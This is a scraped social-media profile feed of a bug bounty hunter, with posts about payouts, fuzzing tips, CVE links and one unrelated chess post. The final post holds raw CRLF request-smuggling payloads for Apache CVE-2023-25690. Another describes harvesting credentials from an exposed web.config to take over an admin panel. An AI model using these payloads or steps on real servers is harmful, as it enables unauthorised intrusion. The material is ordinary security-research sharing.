K.S.S
@0xhaxor
Followers
1K
Following
12K
Media
67
Statuses
3K
Full-Time BBH. Crossed 2 CR In Bug Bounties On all Platforms. Gamer | Hacker
India
Joined March 2015
Yay, I was awarded a $3,000 bounty on @Hacker0x01!
hackerone.com
Full time bug bounty hunter. Mostly active on Bugcrowd. -
1
0
2
Last month was my highest in bug bounty so far with almost $131k in bounty. Total paid reports: 18 Average reward: $7.3k Category: most were logical findings via reversing mobile applications and discovering internal endpoints leading to code execution and missing auth etc
100
128
3K
Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956) https://t.co/lb5CNJGqmD This issue is similar to SpringMVC CVE-2018-1271 by @orange_8361
4
70
241
Overwhelmed by the love from the fans in Warsaw!π
Praggnanandhaa's autograph marathon in PolandποΈβ¨! #ChessSuperstar #superbetrapidblitzpoland #grandchesstour
40
291
4K
Decided to publish PPPwn early. The first PlayStation 4 Kernel RCE. Supporting FWs upto 11.00. https://t.co/INayQSp8fL
344
951
5K
Pic of the Day #infosec #cybersecurity #cybersecuritytips #pentesting #cybersecurityawareness #informationsecurity
5
116
661
The damage of VDP programs and their Incentivization is far greater than giving some hunters "points" for farming none-bugs that they can later boast on their CV's, I believe it might actually ruin Bug Bounty platforms in the near future, Let's explore the facts π So VDP's, as
62
159
694
Another P1 using @GodfatherOrwa tip: - Found default IIS BLUE page - Run tool shortscan for iis - Found endpoint like : target~.zip - run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover. #bugbountytip
19
117
680
Are you fuzzing like a pro? π Dive into some Ffuf tuning tips that could elevate your game. π€π» π§΅1/x #BugBounty #InfoSec #BugBountyTips #BumBumTips #HackingTips
4
52
205
soon enough there will be a video for BugCrwod Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
50
44
810
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. Iβve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by
8
75
454
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
14
208
917
[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul CLRF Injection GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1 Host: Header Injection GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1 Host: 1.1.1.1 https://t.co/st5iVALH8V
github.com
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
1
119
310